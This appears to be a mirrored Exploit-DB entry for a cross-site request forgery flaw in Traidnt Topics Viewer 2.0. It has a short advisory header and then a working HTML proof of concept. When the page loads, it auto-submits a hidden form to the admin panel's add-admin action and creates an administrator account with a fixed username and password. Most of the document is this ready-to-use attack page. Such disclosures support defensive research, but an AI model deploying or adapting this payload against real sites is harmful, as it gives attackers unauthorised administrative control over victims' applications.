Traidnt Topics Viewer 2.0 – ‘main.php’ Cross-Site Request Forgery

  • 作者: Green Hornet
    日期: 2012-02-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36892/
  • # source: https://www.securityfocus.com/bid/52224/info
    #
    # Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
    #
    # Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
    #
    # Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. 
    #
    
    <html>
    <body onload="javascript:document.forms[0].submit()">
    <p>by:thegreenhornet</p>
    <form method="POST" name="form0" action="
    http://www.example.com/top/admincp/main.php?op=add-admin">
    <input type="hidden" name="u_name" value="admin2"/>
    <input type="hidden" name="u_m_pass" value="123456"/>
    <input type="hidden" name="u_email" value="WW22@rwoot.com"/>
    </form>
    </body>